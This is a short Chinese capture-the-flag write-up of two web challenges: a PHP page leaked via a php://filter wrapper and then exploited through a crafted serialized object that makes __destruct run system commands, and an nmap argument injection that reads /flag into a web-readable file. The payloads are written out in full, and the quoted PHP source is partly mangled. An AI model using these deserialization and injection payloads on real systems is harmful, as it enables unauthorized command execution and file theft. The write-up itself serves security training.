前言
没错,我就是懒狗。。。题目在CTFHUB上有复现
PHP_WEB 反序列化+函数构造+伪协议读取
打开页面,发现什么都有,抓包看一下
发现有func和p参数,而且参数配合起来是个PHP内置函数,猜测可以构造PHP函数,先简单fuzz
发现file_get_contents这个没有被过滤,可以利用这个函数配合伪协议读取文件
func=file_get_contents&p=php://filter/read=convert.base64-encode/resource=index.php
解码
phpwebbackground:url("bg.jpg") no-repeat;
background-size: 100%;
}
p {
color:white;
}
"escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",
"array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
"array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;
}else{return "";
}
}classTest {var $p = "Y-m-d h:i:s a";var $func = "date";function__destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);
}
}
}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);
}else{die("Hacker...");
}
}?>
重点是PHP代码,Test类里有个__destruct()方法,那就构造反序列字符串。然后func那填unserialize进行反序列化触发__destruct()
脚本
}$a=newTest;print(serialize($a));?>
//O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
传入
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"cat /flag_2654626055";s:4:"func";s:6:"system";}
NMAP namp命令使用
127.0.0.1’ -iL /flag -oN vege.txt’ 提交之后去访问/vege.txt
-iL从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息
-oN 把扫描结果重定向到一个可读的文件logfilename中。
参考链接:
官方WP
https://blog.csdn.net/Pdsdt1/article/details/106199660/